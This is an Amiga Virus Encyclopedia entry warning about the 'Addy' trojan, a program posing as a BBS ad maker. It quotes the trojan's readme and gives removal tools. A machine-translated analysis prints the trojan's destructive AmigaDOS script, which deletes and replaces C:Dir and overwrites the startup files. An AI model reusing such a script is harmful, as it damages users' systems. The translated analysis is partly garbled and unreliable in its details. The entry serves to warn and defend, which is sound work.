Addy Trojan - Amiga Virus Encyclopedia

VIRUS HELP TEAM
 


 
------------------------
Amiga Virus Encyclopedia
Addy Trojan
------------------------


Hi all 
 
Do NOT start the 'ADDY0.99.Exe', it will replace your startup-sequence
and shell-startup, and add 656 bytes to your c:Dir command.

It will change your startup.sequence with a new small one:

Prompt "AfraId ?..tHe fReAk wAs hEre 2 dEvEstAte  NDOS:>"

Every time you run a shell it will add a line in your user-startup
"Wait 5" and you will the the text above when you are rebooting.

I do not know what it does to your C:Dir command, but if you have
started this program up, the replace the c:Dir command, with a new
clean one, form your WB disk's.

It will work under KS 2.0 and 3.0, have not tested it under KS 1.3 yet.

There is a "Readme" text in the archive, this is what is says:

///////////////////////// Addy Ver. 0.99 \\\\\\\\\\\\\\\\\\\\\\\\
                          --------------
WHAT THE FUCK IS IT ?
A small BBS Add maker, for you guys to put in your .lha's :)
This Programme is made by me, if you like it, tell me cause i've JUST
started learning how to do make small programmes, if there are any bugs
in it, please let me know, i can be found at the coolest bbs'es in Sw.
(Sorry about the lame doc, but i just cant wait to release my
first programme).

Usage:
If you cant figure this one out, you never will.
Simply double click And follow the instructions. Easy Huh ?
Known Bugs: NONE.. at all.. tested very well.. Wouldent want my first
release to be crap.. would I ?

Written By The Freak !
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\////////////////////////////////

There is a FILE ID.DIZ to, here is the text:

 _________________________
:                         :
|  _____________________  |
|  \\\\\\\\\\///////////  |
|   \\Addy\ver./0.99///   |
|    \\\\\my\FIRST////    |
|     \\Release EVER/     |
|      \\\\\\///////      |
|       ~~~~~~~~~~~       |
|     > bY tHe FreAk <    |
|         SysOp at        |
|        Money Talks      |
|      +44 ELITE ONLY     |
+_________________________+

------ END -------

 The archive is on it's way to every well known antivirus programmer
 in the world, thanx guys for the great job you are doing.....

 Thanx to Morph, for sending me this new 'Thing'.

 Antivirus removal: Kickstart 1.2 & 1.3 : VT-Schutz v3.17
                    Kickstart all others: VirusZ III with Xvs.library installed


 Regards
                                       _________    _
 Jan Andersen.                    ____/"""./###/____)\_____________
 Virus Help - Team Denmark.      /"""/   //_______   /"""/""./"___/_HELP!
                                /   /   //"""/"  / //   /  //____   \_
                                \      //   /  ____/   /  //""""/X\@!/
                                 \_____/\__/___/ ""\______/_________/
                                              /____/

 =============== Dokumantation from VT by Heiner Schneegold =============
 
    Addy Trojan file
       VT only offers delete.
       No bent vectors
       Not reset-proof
       Length packed: 9584 bytes
       A script packer is used, which I have rarely seen so far
       have found.
       Needs copy, delete with FORCE (i.e. newer WB) and wait. Otherwise
       Abort the script.
       Then carry out a reset.
    
     The file reads:
          6d6f7279 0000434f 4e3a302f 302f3634 mory..CON: 0/0/64
          302f3230 302f5465 73743031 0000646f 0/200 / Test01..do
          732e6c69 62726172 79007261 6d3a7100 s.library.ram: q.
          72616d3a 54656d70 00006364 2072616d ram: Temp..cd ram
          3a54656d 700a5255 4e200000 00000000: Temp.RUN ......
            ; .....
          00000000 00000000 00006364 2072616d .......... cd ram
          3a54656d 70200a45 58454355 54452000: Temp .EXECUTE.
            ; .....
          00000000 00000000 00000000 0a656e64 ............. end
          636c690a 0a776169 7420330a 656e6463 cli..wait 3.endc
          6c690a00 00000000 00000004 446f6974 li .......... Doit
     
     Damages:
       Write new dir command (addy dir wrong see below)
       Changes startup sequence, user startup and shell startup.
       You now have to back up these files too
       have on disc.
       Shell Startup:
       Before:
       ; ......
       Alias XCopy "Copy CLONE"
       Later:
       ; ......
       Alias XCopy "Copy CLONE"
       wAiT 5
       Echo Wait 5 >> Sys: S / sTarTup-SEQUENCE
       Startup-Sequence:
       Before:
       ; cls
       ; Test line
       ; Test line
       ; Test line
       Later:
       Prompt "aFraId? .. the frAke what her 2 devEstate NDOS:>"
       wAiT 5
       So just deleted the start of my startup !!!!!
       User-Startup:
       Before:
       ; ......
       ; END AsimCDFS
       Later:
       ; ......
       ; END AsimCDFS
       wAiT 5

       Several files have appeared in RAM: T and RAM: Temp, but
       disappear again with the RESET.
       An example: Doit (a script) content:
         Type Ram: temp / Oups> Sys: s / StaRtup-SeqUeNcE
         Delete C: Dir Quiet Force
         Copy Ram: temp / Dir C:
         eCHo wAiT 5 >> SyS: s / sTarTuP-SeQuEnCe
         eCHo wAiT 5 >> SyS: s / uSeR StaRtUp
         eChO wAiT 5 >> SyS: S / SheLl-StArtUp
         Echo Echo Wait 5 >> Sys: S / Shell-Startup >> Sys: S / sTarTup-sEquEncE
         Echo Error # 0025 Program Loop Unexpected
         Wait 1
         test01


     Original test by Heiner Schneegold
     Translated from german to english by Google translate
Virum Help Team
Denmark & Canada
Copyright © All rights reserved
www.vht.dk